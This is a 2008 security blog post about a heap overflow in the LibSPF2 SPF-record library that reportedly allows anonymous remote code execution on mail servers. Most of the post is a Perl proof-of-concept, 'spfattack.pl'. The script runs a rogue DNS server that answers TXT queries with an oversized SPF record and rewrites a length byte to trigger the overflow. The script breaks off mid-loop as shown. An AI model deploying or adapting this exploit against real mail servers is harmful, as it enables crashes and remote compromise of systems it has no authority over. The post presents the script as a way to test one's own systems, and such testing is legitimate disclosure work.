Resources
Home

6 Year Threat to Cyber Security Critical Infrastructure…

Nov 05, 2008 by james.foster
LibSPF2 Google Code Search Results

I hate to pound the drum for cyber security threats on national security again but here is a perfect example of an issue that has been around for more than 6 years and potentially affects countless applications and tools. A quick search on Google’s Code Search reveals about 1,000 results for LibSPF2.

A heap overflow vulnerability exists in the LibSPF2 library which would allow users to anonymously execute remote code. LibSPF2 is a library frequently used to retrieve Sender Policy Framework (SPF) records and apply policies according to those records. The interesting point is that this library was designed to be on Internet-accessible email servers. Who do you fire in an organization for installing or using vulnerable applications? The bigger question is “would anyone be left?”

The following is some code to test your systems for this vulnerability.

Simple code to reproduce heap overflow:

# cat spfattack.pl
#!/usr/bin/perl
#

use Net::DNS;
use IO::Socket::INET;
use Data::HexDump;

my $qclass = "IN";
my $ttl = 10;

while (1){
my $sock = IO::Socket::INET->new(
LocalPort => '53',
Proto => 'udp');
$sock->recv($newmsg, 2048);
my $req = Net::DNS::Packet->new(\$newmsg);
$req->print;
my $id = $req->header->id();
my @q = $req->question;
my $qname = $q[0]->qname;
my $qtype = $q[0]->qtype;
if($qtype eq "PTR") { next; }
$answer = Net::DNS::Packet->new($qname, $qtype);
if($qtype eq "TXT"){
$answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype
'v=spf1 mx +all'"));
my $spf = "A"x233;
$answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype
'$spf'"));
}
if($qtype eq "MX"){}

$answer->header->id($id);
$answer->header->aa(1);
$answer->header->qr(1);
$answer->print;
my $port = $sock->peerport;
my $peer = inet_ntoa($sock->peeraddr);

$sock->shutdown(2);
$sock = "";

my $tempsock = IO::Socket::INET->new(
LocalPort=>'53',
PeerAddr=>"$peer",
PeerPort=>$port,
Proto=>'udp');

my $newans;

$newans = $answer->data;
if($qtype eq "TXT"){
substr($newans, 44, 1, pack("c",0xff));
print HexDump $newans;
}
$tempsock->send($newans);

#my $packet = Net::DNS::Packet->new(\$newmsg);

Tags: